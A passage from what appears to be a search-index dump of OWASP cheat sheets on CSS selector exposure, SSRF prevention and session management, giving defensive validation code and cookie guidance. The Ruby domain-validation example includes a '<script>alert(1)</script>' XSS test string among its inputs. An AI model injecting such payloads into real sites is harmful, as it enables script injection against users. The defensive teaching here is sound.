Example: Profile Settings will be applicable to all the users here while Adding Users or Deleting Users is only applicable for Administrator.

Example:

Now, let's examine the risks associated with this style of coding.

"},{"location":"cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html#risk-1","title":"Risk #1","text":"

Motivated Attackers always take a look at *.CSS files to learn the features of the application even without being logged in.

For instance: Jim is a motivated attacker and always tries to look into CSS files from the View-Source even before other attacks. When Jim looks into the CSS file, they see that there are different features and different roles based on the CSS selectors like .profileSettings, .editUser, .addUser, .deleteUser and so on. Jim can use the CSS for intel gathering to help gain access to sensitive roles. This is a form of attacker due diligence even before trying to perform dangerous attacks to gain access to the web application.

In a nutshell, having global styling could reveal sensitive information that could be beneficial to the attacker.

"},{"location":"cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html#risk-2","title":"Risk #2","text":"

Let's say Santhosh has the habit of writing descriptive selector names like .profileSettings, .exportUserData, .changePassword, .oldPassword, .newPassword, .confirmNewPassword etc. Good programmers like to keep code readable and usable by other code reviewers on the team. The risk is that attackers could map these selectors to actual features of a web application.

"},{"location":"cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html#defensive-mechanisms-to-mitigate-attackers-motivation","title":"Defensive Mechanisms to Mitigate Attacker's Motivation","text":""},{"location":"cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html#defense-mechanism-1","title":"Defense Mechanism #1","text":"

As a CSS coder / programmer, always keep the CSS isolated by access control level. This means Student will have a different CSS file called StudentStyling.CSS while Administrator has AdministratorStyling.CSS, and so on. Make sure these *.CSS files can only be accessed by users with the proper access control level.

If an authenticated user with the Student Role tries to access AdministratorStyling.CSS through forced browsing, an alert that an intrusion is occurring should be recorded.

"},{"location":"cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html#defense-mechanism-2","title":"Defense Mechanism #2","text":"

Another option is to modify your CSS files to remove any identifying information. As a general rule, it's recommended that your website have a consistent style between pages, and it's best to write your general CSS rules in such a way that they apply across multiple pages. This reduces the need for specific selectors in the first place. Furthermore, it's often possible to create CSS selectors that target specific HTML elements without using IDs or class names. For example, #UserPage .Toolbar .addUserButton could be rewritten to something more obscure such as #page_u header button:first-of-type.

Build-time and runtime tools also exist, which can be integrated to obfuscate your class names. This can reduce the chance of an attacker guessing the features of your application. Some examples:

"},{"location":"cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html#defense-mechanism-3","title":"Defense Mechanism #3","text":"

Web applications that allow users to author content via HTML input could be vulnerable to malicious use of CSS. Uploaded HTML could use styles that are allowed by the web application but could be used for purposes other than intended which could lead to security risks.

Example: You can read about how LinkedIn had a vulnerability which allowed malicious use of CSS to execute a Clickjacking attack. This caused the document to enter a state where clicking anywhere on the page would result in loading a potentially malicious website. You can read more about mitigating clickjacking attacks here.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html","title":"Server-Side Request Forgery Prevention Cheat Sheet","text":""},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The objective of this cheat sheet is to provide advice on protecting against Server-Side Request Forgery (SSRF) attacks.

This cheat sheet will focus on the defensive point of view and will not explain how to perform this attack. This talk from the security researcher Orange Tsai as well as this document provide techniques on how to perform this kind of attack.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#context","title":"Context","text":"

SSRF is an attack vector that abuses an application to interact with the internal/external network or the machine itself. One of the enablers for this vector is the mishandling of URLs, as showcased in the following examples:

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#overview-of-a-ssrf-common-flow","title":"Overview of a SSRF common flow","text":"

Notes:

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#cases","title":"Cases","text":"

Depending on the application's functionality and requirements, there are two basic cases in which SSRF can happen:

Because these two cases are very different, this cheat sheet will describe defences against them separately.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#case-1-application-can-send-request-only-to-identified-and-trusted-applications","title":"Case 1 - Application can send request only to identified and trusted applications","text":"

Sometimes, an application needs to perform a request to another application, often located on another network, to perform a specific task. Depending on the business case, user input is required for the functionality to work.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#example","title":"Example","text":"

Take the example of a web application that receives and uses personal information from a user, such as their first name, last name, birth date etc. to create a profile in an internal HR system. By design, that web application will have to communicate using a protocol that the HR system understands to process that data. Basically, the user cannot reach the HR system directly, but, if the web application in charge of receiving user information is vulnerable to SSRF, the user can leverage it to access the HR system. The user leverages the web application as a proxy to the HR system.

The allow list approach is a viable option since the internal application called by the VulnerableApplication is clearly identified in the technical/business flow. It can be stated that the required calls will only be targeted between those identified and trusted applications.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#available-protections","title":"Available protections","text":"

Several protective measures are possible at the Application and Network layers. To apply the defense in depth principle, both layers will be hardened against such attacks.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#application-layer","title":"Application layer","text":"

The first level of protection that comes to mind is Input validation.

Based on that point, the following question comes to mind: how should this input validation be performed?

As Orange Tsai shows in his talk, depending on the programming language used, parsers can be abused. One possible countermeasure is to apply the allow list approach when input validation is used because, most of the time, the format of the information expected from the user is globally known.

The request sent to the internal application will be based on the following information:

Note: Disable support for following redirects in your web client in order to prevent bypassing the input validation described in the section Exploitation tricks > Bypassing restrictions > Input validation > Unsafe redirect of this document.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#string","title":"String","text":"

In the context of SSRF, validations can be added to ensure that the input string respects the business/technical format expected.

A regex can be used to ensure that the data received is valid from a security point of view if the input data has a simple format (e.g. a token, a zip code, etc.). Otherwise, validation should be conducted using the libraries available for the string object, because regexes for complex formats are difficult to maintain and highly error-prone.

User input is assumed to be non-network related and consists of the user's personal information.

Example:

//Regex validation for a data having a simple format\nif(Pattern.matches(\"[a-zA-Z0-9\\\\s\\\\-]{1,50}\", userInput)){\n//Continue the processing because the input data is valid\n}else{\n//Stop the processing and reject the request\n}\n
"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#ip-address","title":"IP address","text":"

In the context of SSRF, there are 2 possible validations to perform:

  1. Ensure that the data provided is a valid IPv4 or IPv6 address.
  2. Ensure that the IP address provided belongs to one of the IP addresses of the identified and trusted applications.

The first layer of validation can be applied using libraries that ensure the security of the IP address format, based on the technology used (a library is suggested here in order to delegate handling of the IP address format and leverage a battle-tested validation function):

The proposed libraries have been verified against exposure to the bypasses (Hex, Octal, Dword, URL and Mixed encoding) described in this article.

Use the output value of the method/library as the IP address to compare against the allow list.

After ensuring the validity of the incoming IP address, the second layer of validation is applied. An allow list is created after determining all the IP addresses (v4 and v6, to avoid bypasses) of the identified and trusted applications. The valid IP is then cross-checked against that list (strict, case-sensitive string comparison) to confirm that it belongs to one of the identified and trusted applications.
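
The sketch below illustrates these two validation layers in Python using the standard ipaddress module; the allow list values are purely illustrative assumptions, not part of the original cheat sheet:

import ipaddress\n\n# Assumed allow list of the identified and trusted internal application IPs (illustrative values)\nALLOWED_IPS = [\"10.0.10.5\", \"2001:db8::10\"]\n\ndef is_allowed_ip(user_input):\n    # First layer: ensure the input is a syntactically valid IPv4 or IPv6 address\n    try:\n        ip = ipaddress.ip_address(user_input.strip())\n    except ValueError:\n        return False\n    # Second layer: strict comparison of the canonical form against the allow list\n    return str(ip) in ALLOWED_IPS\n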

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#domain-name","title":"Domain name","text":"

When attempting to validate domain names, it may seem obvious to perform a DNS resolution in order to verify that the domain exists. In general, this is not a bad idea, yet it opens the application up to attacks depending on the configuration of the DNS servers used for domain name resolution:

In the context of SSRF, there are two validations to perform:

  1. Ensure that the data provided is a valid domain name.
  2. Ensure that the domain name provided belongs to one of the domain names of the identified and trusted applications (this is where allow listing comes into action).

Similar to the IP address validation, the first layer of validation can be applied using libraries that ensure the security of the domain name format, based on the technology used (a library is suggested here in order to delegate handling of the domain name format and leverage a battle-tested validation function):

The proposed libraries have been verified to ensure that their functions do not perform any DNS resolution query.

Example of execution of the proposed regex for Ruby:

domain_names = [\"owasp.org\",\"owasp-test.org\",\"doc-test.owasp.org\",\"doc.owasp.org\",\n\"<script>alert(1)</script>\",\"<script>alert(1)</script>.owasp.org\"]\ndomain_names.each { |domain_name|\nif ( domain_name =~ /^(((?!-))(xn--|_{1,1})?[a-z0-9-]{0,61}[a-z0-9]{1,1}\\.)*(xn--)?([a-z0-9][a-z0-9\\-]{0,60}|[a-z0-9-]{1,30}\\.[a-z]{2,})$/ )\nputs \"[i] #{domain_name} is VALID\"\nelse\nputs \"[!] #{domain_name} is INVALID\"\nend\n}\n
$ ruby test.rb\n[i] owasp.org is VALID\n[i] owasp-test.org is VALID\n[i] doc-test.owasp.org is VALID\n[i] doc.owasp.org is VALID\n[!] <script>alert(1)</script> is INVALID\n[!] <script>alert(1)</script>.owasp.org is INVALID\n

After ensuring the validity of the incoming domain name, the second layer of validation is applied:

  1. Build an allow list with all the domain names of every identified and trusted application.
  2. Verify that the domain name received is part of this allow list (strict, case-sensitive string comparison), as sketched below.
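
A minimal sketch of this second layer in Python (the allow list content is an illustrative assumption):

# Assumed allow list of the domain names of the identified and trusted applications\nDOMAINS_ALLOWLIST = [\"internal-hr.example\", \"doc.owasp.org\"]\n\ndef is_allowed_domain(domain_name):\n    # Strict, case-sensitive string comparison against the allow list\n    return domain_name in DOMAINS_ALLOWLIST\n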

Unfortunately, the application is still vulnerable to the DNS pinning bypass mentioned in this document, because a DNS resolution will be made when the business code is executed. To address that issue, the following actions must be taken in addition to the validation of the domain name:

  1. Ensure that the domains that are part of your organization are resolved by your internal DNS server first in the chain of DNS resolvers.
  2. Monitor the domains allow list in order to detect when any of them resolves to:
      1. A local IP address (V4 + V6).
      2. An internal IP of your organization (expected to be in private IP ranges), for domains that are not part of your organization.

The following Python3 script can be used, as a starting point, for the monitoring mentioned above:

# Dependencies: pip install dnspython\nimport ipaddress\nimport dns.resolver\n\n# Configure the allow list to check\nDOMAINS_ALLOWLIST = [\"owasp.org\", \"labslinux\"]\n\n# Configure the DNS resolver to use for all DNS queries\nDNS_RESOLVER = dns.resolver.Resolver()\nDNS_RESOLVER.nameservers = [\"1.1.1.1\"]\n\ndef verify_dns_records(domain, records, type):\n    \"\"\"\n    Verify if one of the DNS records resolves to a non public IP address.\n    Return a boolean indicating if any error has been detected.\n    \"\"\"\n    error_detected = False\n    if records is not None:\n        for record in records:\n            value = record.to_text().strip()\n            try:\n                ip = ipaddress.ip_address(value)\n                # See https://docs.python.org/3/library/ipaddress.html#ipaddress.IPv4Address.is_global\n                if not ip.is_global:\n                    print(\"[!] DNS record type '%s' for domain name '%s' resolves to a non public IP address '%s'!\" % (type, domain, value))\n                    error_detected = True\n            except ValueError:\n                error_detected = True\n                print(\"[!] '%s' is not a valid IP address!\" % value)\n    return error_detected\n\ndef check():\n    \"\"\"\n    Perform the check of the allow list of domains.\n    Return a boolean indicating if any error has been detected.\n    \"\"\"\n    error_detected = False\n    for domain in DOMAINS_ALLOWLIST:\n        # Get the IPs of the current domain\n        # See https://en.wikipedia.org/wiki/List_of_DNS_record_types\n        try:\n            # A = IPv4 address record\n            ip_v4_records = DNS_RESOLVER.query(domain, \"A\")\n        except Exception as e:\n            ip_v4_records = None\n            print(\"[i] Cannot get A record for domain '%s': %s\\n\" % (domain, e))\n        try:\n            # AAAA = IPv6 address record\n            ip_v6_records = DNS_RESOLVER.query(domain, \"AAAA\")\n        except Exception as e:\n            ip_v6_records = None\n            print(\"[i] Cannot get AAAA record for domain '%s': %s\\n\" % (domain, e))\n        # Verify the IPs obtained\n        if verify_dns_records(domain, ip_v4_records, \"A\") or verify_dns_records(domain, ip_v6_records, \"AAAA\"):\n            error_detected = True\n    return error_detected\n\nif __name__ == \"__main__\":\n    if check():\n        exit(1)\n    else:\n        exit(0)\n
"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#url","title":"URL","text":"

Do not accept complete URLs from the user, because URLs are difficult to validate and the parser can be abused depending on the technology used, as showcased in the talk by Orange Tsai referenced earlier.

If network-related information is really needed, then only accept a valid IP address or domain name.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#network-layer","title":"Network layer","text":"

The objective of the Network layer security is to prevent the VulnerableApplication from performing calls to arbitrary applications. Only allowed routes will be available for this application, in order to limit its network access to only the applications it should communicate with.

The Firewall component, as a specific device or using the one provided within the operating system, will be used here to define the legitimate flows.

In the schema below, a Firewall component is leveraged to limit the application's access, and in turn, limit the impact of an application vulnerable to SSRF:

Network segregation (see this set of implementation advice) can also be leveraged, and is highly recommended, in order to block illegitimate calls directly at the network level.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#case-2-application-can-send-requests-to-any-external-ip-address-or-domain-name","title":"Case 2 - Application can send requests to ANY external IP address or domain name","text":"

This case happens when a user can control a URL to an External resource and the application makes a request to this URL (e.g. in case of WebHooks). Allow lists cannot be used here because the list of IPs/domains is often unknown upfront and is dynamically changing.

In this scenario, External refers to any IP that doesn't belong to the internal network, and should be reached by going over the public internet.

Thus, the call from the Vulnerable Application:

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#challenges-in-blocking-urls-at-application-layer","title":"Challenges in blocking URLs at application layer","text":"

Based on the business requirements of the above-mentioned applications, the allow list approach is not a valid solution. Despite knowing that the block-list approach is not an impenetrable wall, it is the best solution in this scenario: it tells the application what it should not do.

Here is why filtering URLs is hard at the Application layer:

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#available-protections_1","title":"Available protections","text":"

The same assumptions as in the example above are taken into consideration for the following sections.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#application-layer_1","title":"Application layer","text":"

As in case n\u00b01, it is assumed that the IP address or domain name is required to create the request that will be sent to the TargetApplication.

The first validation on the input data presented in case n\u00b01 for the 3 types of data will be the same for this case, BUT the second validation will differ: here, the block-list approach must be used.

Regarding the proof of legitimacy of the request: the TargetedApplication that will receive the request must generate a random token (e.g. an alphanumeric string of 20 characters) that the caller is expected to pass (in the body, via a parameter whose name is also defined by the application itself and only allows the character set [a-z]{1,10}) in order to perform a valid request. The receiving endpoint must only accept HTTP POST requests.

Validation flow (if any of the validation steps fails then the request is rejected):

  1. The application will receive the IP address or domain name of the TargetedApplication and it will apply the first validation on the input data using the libraries/regex mentioned in this section.
  2. The second validation will be applied against the IP address or domain name of the TargetedApplication using the following block-list approach:
  3. For IP address:
  4. For domain name: 1. The application will verify that it is a public one by trying to resolve the domain name against the DNS resolver that will only resolve internal domain names. Here, it must return a response indicating that it does not know the provided domain, because the expected value received must be a public domain. 2. To prevent the DNS pinning attack described in this document, the application will retrieve all the IP addresses behind the domain name provided (taking A + AAAA records for IPv4 + IPv6) and apply the same verification described in the previous point about IP addresses.
  5. The application will receive the protocol to use for the request via a dedicated input parameter for which it will verify the value against an allowed list of protocols (HTTP or HTTPS).
  6. The application will receive the parameter name for the token to pass to the TargetedApplication via a dedicated input parameter for which it will only allow the characters set [a-z]{1,10}.
  7. The application will receive the token itself via a dedicated input parameter for which it will only allow the characters set [a-zA-Z0-9]{20}.
  8. The application will receive and validate (from a security point of view) any business data needed to perform a valid call.
  9. The application will build the HTTP POST request using only validated information and will send it (don't forget to disable support for redirect following in the web client used), as sketched below.
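
The following Python sketch illustrates steps 5 to 9 of this flow using the requests library; the endpoint path, parameter names and timeout are illustrative assumptions, and the host is assumed to have already passed the block-list checks of the earlier steps:

import re\nimport requests  # third-party HTTP client\n\nALLOWED_PROTOCOLS = {\"http\", \"https\"}\nTOKEN_PARAM_RE = re.compile(r\"^[a-z]{1,10}$\")\nTOKEN_VALUE_RE = re.compile(r\"^[a-zA-Z0-9]{20}$\")\n\ndef send_validated_request(protocol, host, token_param, token_value, business_data):\n    # Steps 5 to 7: validate the protocol, the token parameter name and the token value\n    if protocol not in ALLOWED_PROTOCOLS:\n        raise ValueError(\"Protocol not allowed\")\n    if not TOKEN_PARAM_RE.match(token_param) or not TOKEN_VALUE_RE.match(token_value):\n        raise ValueError(\"Invalid token parameter name or token value\")\n    # Step 9: build the POST request from validated data only and disable redirect following\n    url = \"%s://%s/endpoint\" % (protocol, host)  # '/endpoint' is an assumed path\n    body = {token_param: token_value}\n    body.update(business_data)  # step 8: business data validated beforehand\n    return requests.post(url, data=body, allow_redirects=False, timeout=5)\n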
"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#network-layer_1","title":"Network layer","text":"

Similar to the Network layer protections described for case n\u00b01.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#imdsv2-in-aws","title":"IMDSv2 in AWS","text":"

In cloud environments SSRF is often used to access and steal credentials and access tokens from metadata services (e.g. AWS Instance Metadata Service, Azure Instance Metadata Service, GCP metadata server).

IMDSv2 is an additional defence-in-depth mechanism for AWS that mitigates some of the instances of SSRF.

To leverage this protection, migrate to IMDSv2 and disable the older IMDSv1. Check out the AWS documentation for more details.
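
As an illustrative sketch (not part of the original cheat sheet), IMDSv2 can be enforced on an existing instance with the AWS SDK for Python; the instance ID below is a placeholder and credentials are assumed to be configured:

import boto3  # AWS SDK for Python\n\nec2 = boto3.client(\"ec2\")\n# Require session tokens (IMDSv2) so that IMDSv1 requests are rejected\nec2.modify_instance_metadata_options(\n    InstanceId=\"i-0123456789abcdef0\",  # placeholder instance ID\n    HttpTokens=\"required\",\n    HttpEndpoint=\"enabled\",\n)\n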

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#semgrep-rules","title":"Semgrep Rules","text":"

Semgrep is a command-line tool for offline static analysis. Use pre-built or custom rules to enforce code and security standards in your codebase. Check out the Semgrep rule for SSRF to identify/investigate SSRF vulnerabilities in Java: https://semgrep.dev/salecharohit:owasp_java_ssrf

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#references","title":"References","text":"

Online version of the SSRF bible (PDF version is used in this cheat sheet).

Article about Bypassing SSRF Protection.

Articles about SSRF attacks: Part 1, part 2 and part 3.

Article about IMDSv2

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#tools-and-code-used-for-schemas","title":"Tools and code used for schemas","text":"

Mermaid code for the SSRF common flow (a screenshot is used to capture the PNG image inserted into this cheat sheet):

sequenceDiagram\n    participant Attacker\n    participant VulnerableApplication\n    participant TargetedApplication\n    Attacker->>VulnerableApplication: Crafted HTTP request\n    VulnerableApplication->>TargetedApplication: Request (HTTP, FTP...)\n    Note left of TargetedApplication: Use payload included<br>into the request to<br>VulnerableApplication\n    TargetedApplication->>VulnerableApplication: Response\n    VulnerableApplication->>Attacker: Response\n    Note left of VulnerableApplication: Include response<br>from the<br>TargetedApplication\n

Draw.io schema XML code for the \"case 1 for network layer protection about flows that we want to prevent\" schema (a screenshot is used to capture the PNG image inserted into this cheat sheet).

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html","title":"Session Management Cheat Sheet","text":""},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Web Authentication, Session Management, and Access Control:

A web session is a sequence of network HTTP request and response transactions associated with the same user. Modern and complex web applications require the retaining of information or status about each user for the duration of multiple requests. Therefore, sessions provide the ability to establish variables \u2013 such as access rights and localization settings \u2013 which will apply to each and every interaction a user has with the web application for the duration of the session.

Web applications can create sessions to keep track of anonymous users after the very first user request. An example would be maintaining the user language preference. Additionally, web applications will make use of sessions once the user has authenticated. This ensures the ability to identify the user on any subsequent requests, to apply security access controls and authorized access to the user's private data, and to increase the usability of the application. Therefore, current web applications can provide session capabilities both pre and post authentication.

Once an authenticated session has been established, the session ID (or token) is temporarily equivalent to the strongest authentication method used by the application, such as username and password, passphrases, one-time passwords (OTP), client-based digital certificates, smartcards, or biometrics (such as fingerprint or eye retina). See the OWASP Authentication Cheat Sheet.

HTTP is a stateless protocol (RFC2616 section 5), where each request and response pair is independent of other web interactions. Therefore, in order to introduce the concept of a session, it is required to implement session management capabilities that link both the authentication and access control (or authorization) modules commonly available in web applications:

The session ID or token binds the user authentication credentials (in the form of a user session) to the user HTTP traffic and the appropriate access controls enforced by the web application. The complexity of these three components (authentication, session management, and access control) in modern web applications, plus the fact that their implementation and binding rests in the web developer's hands (as web development frameworks do not provide strict relationships between these modules), makes the implementation of a secure session management module very challenging.

The disclosure, capture, prediction, brute force, or fixation of the session ID will lead to session hijacking (or sidejacking) attacks, where an attacker is able to fully impersonate a victim user in the web application. Attackers can perform two types of session hijacking attacks, targeted or generic. In a targeted attack, the attacker's goal is to impersonate a specific (or privileged) web application victim user. For generic attacks, the attacker's goal is to impersonate (or get access as) any valid or legitimate user in the web application.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-id-properties","title":"Session ID Properties","text":"

In order to keep the authenticated state and track the user's progress within the web application, applications provide users with a session identifier (session ID or token) that is assigned at session creation time, and is shared and exchanged by the user and the web application for the duration of the session (it is sent on every HTTP request). The session ID is a name=value pair.

With the goal of implementing secure session IDs, the generation of identifiers (IDs or tokens) must meet the following properties.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-id-name-fingerprinting","title":"Session ID Name Fingerprinting","text":"

The name used by the session ID should not be extremely descriptive nor offer unnecessary details about the purpose and meaning of the ID.

The session ID names used by the most common web application development frameworks can be easily fingerprinted, such as PHPSESSID (PHP), JSESSIONID (J2EE), CFID & CFTOKEN (ColdFusion), ASP.NET_SessionId (ASP .NET), etc. Therefore, the session ID name can disclose the technologies and programming languages used by the web application.

It is recommended to change the default session ID name of the web development framework to a generic name, such as id.
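
For instance, a minimal sketch for a Flask application (Flask is used here purely as an illustration; any framework exposes a similar setting):

from flask import Flask\n\napp = Flask(__name__)\n# Replace the framework's default session cookie name with a generic one\napp.config[\"SESSION_COOKIE_NAME\"] = \"id\"\n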

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-id-length","title":"Session ID Length","text":"

The session ID must be long enough to prevent brute force attacks, where an attacker can go through the whole range of ID values and verify the existence of valid sessions.

The session ID length must be at least 128 bits (16 bytes).

NOTE:

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-id-entropy","title":"Session ID Entropy","text":"

The session ID must be unpredictable (random enough) to prevent guessing attacks, where an attacker is able to guess or predict the ID of a valid session through statistical analysis techniques. For this purpose, a good CSPRNG (Cryptographically Secure Pseudorandom Number Generator) must be used.

The session ID value must provide at least 64 bits of entropy (if a good PRNG is used, this value is estimated to be half the length of the session ID).

Additionally, a random session ID is not enough; it must also be unique to avoid duplicated IDs. A random session ID must not already exist in the current session ID space.

NOTE:

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-id-content-or-value","title":"Session ID Content (or Value)","text":"

The session ID content (or value) must be meaningless to prevent information disclosure attacks, where an attacker is able to decode the contents of the ID and extract details of the user, the session, or the inner workings of the web application.

The session ID must simply be an identifier on the client side, and its value must never include sensitive information (or PII).

The meaning and business or application logic associated with the session ID must be stored on the server side, and specifically, in session objects or in a session management database or repository.

The stored information can include the client IP address, User-Agent, e-mail, username, user ID, role, privilege level, access rights, language preferences, account ID, current state, last login, session timeouts, and other internal session details. If the session objects and properties contain sensitive information, such as credit card numbers, it is required to duly encrypt and protect the session management repository.

It is recommended to use the session ID created by your language or framework. If you need to create your own session ID, use a cryptographically secure pseudorandom number generator (CSPRNG) with a size of at least 128 bits and ensure that each session ID is unique.
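
A minimal sketch of such a generator in Python, using the standard secrets module (uniqueness against the existing session store must still be enforced by the caller):

import secrets\n\ndef generate_session_id():\n    # 16 bytes = 128 bits from the OS CSPRNG, hex-encoded (32 characters)\n    return secrets.token_hex(16)\n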

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-management-implementation","title":"Session Management Implementation","text":"

The session management implementation defines the exchange mechanism that will be used between the user and the web application to share and continuously exchange the session ID. There are multiple mechanisms available in HTTP to maintain session state within web applications, such as cookies (standard HTTP header), URL parameters (URL rewriting \u2013 RFC2396), URL arguments on GET requests, body arguments on POST requests, such as hidden form fields (HTML forms), or proprietary HTTP headers.

The preferred session ID exchange mechanism should allow defining advanced token properties, such as the token expiration date and time, or granular usage constraints. This is one of the reasons why cookies (RFCs 2109 & 2965 & 6265) are one of the most extensively used session ID exchange mechanisms, offering advanced capabilities not available in other methods.

The usage of specific session ID exchange mechanisms, such as those where the ID is included in the URL, might disclose the session ID (in web links and logs, web browser history and bookmarks, the Referer header or search engines), as well as facilitate other attacks, such as the manipulation of the ID or session fixation attacks.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#built-in-session-management-implementations","title":"Built-in Session Management Implementations","text":"

Web development frameworks, such as J2EE, ASP .NET, PHP, and others, provide their own session management features and associated implementation. It is recommended to use these built-in frameworks rather than building a home-made one from scratch, as they are used worldwide on multiple web environments and have been tested by the web application security and development communities over time.

However, be advised that these frameworks have also presented vulnerabilities and weaknesses in the past, so it is always recommended to use the latest version available, which potentially fixes all well-known vulnerabilities, and to review and change the default configuration to enhance its security by following the recommendations described throughout this document.

The storage capabilities or repository used by the session management mechanism to temporarily save the session IDs must be secure, protecting the session IDs against local or remote accidental disclosure or unauthorized access.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#used-vs-accepted-session-id-exchange-mechanisms","title":"Used vs. Accepted Session ID Exchange Mechanisms","text":"

A web application should make use of cookies for session ID exchange management. If a user submits a session ID through a different exchange mechanism, such as a URL parameter, the web application should avoid accepting it as part of a defensive strategy to stop session fixation.

NOTE:

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#transport-layer-security","title":"Transport Layer Security","text":"

In order to protect the session ID exchange from active eavesdropping and passive disclosure in the network traffic, it is essential to use an encrypted HTTPS (TLS) connection for the entire web session, not only for the authentication process where the user credentials are exchanged. This may be mitigated by HTTP Strict Transport Security (HSTS) for a client that supports it.

Additionally, the Secure cookie attribute must be used to ensure the session ID is only exchanged through an encrypted channel. The usage of an encrypted communication channel also protects the session against some session fixation attacks where the attacker is able to intercept and manipulate the web traffic to inject (or fix) the session ID on the victim's web browser (see here and here).

The following set of best practices are focused on protecting the session ID (specifically when cookies are used) and helping with the integration of HTTPS within the web application:

See the OWASP Transport Layer Protection Cheat Sheet for more general guidance on implementing TLS securely.

It is important to emphasize that TLS does not protect against session ID prediction, brute force, client-side tampering or fixation; however, it does provide effective protection against an attacker intercepting or stealing session IDs through a man in the middle attack.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#cookies","title":"Cookies","text":"

The session ID exchange mechanism based on cookies provides multiple security features in the form of cookie attributes that can be used to protect the exchange of the session ID:
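
These attributes are detailed in the following sections. As an illustrative sketch (using Flask purely as an example framework), they can typically be configured centrally for the session cookie:

from flask import Flask\n\napp = Flask(__name__)\napp.config.update(\n    SESSION_COOKIE_SECURE=True,    # only send the session cookie over HTTPS\n    SESSION_COOKIE_HTTPONLY=True,  # hide the cookie from scripts (document.cookie)\n    SESSION_COOKIE_SAMESITE=\"Lax\",  # limit sending of the cookie with cross-site requests\n)\n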

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#secure-attribute","title":"Secure Attribute","text":"

The Secure cookie attribute instructs web browsers to only send the cookie through an encrypted HTTPS (SSL/TLS) connection. This session protection mechanism is mandatory to prevent the disclosure of the session ID through MitM (Man-in-the-Middle) attacks. It ensures that an attacker cannot simply capture the session ID from web browser traffic.

Forcing the web application to only use HTTPS for its communication (even when port TCP/80, HTTP, is closed in the web application host) does not protect against session ID disclosure if the Secure cookie has not been set - the web browser can be deceived into disclosing the session ID over an unencrypted HTTP connection. The attacker can intercept and manipulate the victim user's traffic and inject an unencrypted HTTP reference to the web application that will force the web browser to submit the session ID in the clear.

See also: SecureFlag

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#httponly-attribute","title":"HttpOnly Attribute","text":"

The HttpOnly cookie attribute instructs web browsers not to allow scripts (e.g. JavaScript or VBScript) to access the cookies via the DOM document.cookie object. This session ID protection is mandatory to prevent session ID stealing through XSS attacks. However, if an XSS attack is combined with a CSRF attack, the requests sent to the web application will include the session cookie, as the browser always includes the cookies when sending requests. The HttpOnly cookie only protects the confidentiality of the cookie; the attacker cannot use it offline, outside of the context of an XSS attack.

See the OWASP XSS (Cross Site Scripting) Prevention Cheat Sheet.

See also: HttpOnly

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#samesite-attribute","title":"SameSite Attribute","text":"

SameSite defines a cookie attribute that prevents browsers from sending a SameSite-flagged cookie with cross-site requests. The main goal is to mitigate the risk of cross-origin information leakage and to provide some protection against cross-site request forgery attacks.

See also: SameSite

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#domain-and-path-attributes","title":"Domain and Path Attributes","text":"

The Domain cookie attribute instructs web browsers to only send the cookie to the specified domain and all subdomains. If the attribute is not set, by default the cookie will only be sent to the origin server. The Path cookie attribute instructs web browsers to only send the cookie to the specified directory or subdirectories (or paths or resources) within the web application. If the attribute is not set, by default the cookie will only be sent for the directory (or path) of the resource requested and setting the cookie.

It is recommended to use a narrow or restricted scope for these two attributes. In this way, the Domain attribute should not be set (restricting the cookie just to the origin server) and the Path attribute should be set as restrictive as possible to the web application path that makes use of the session ID.

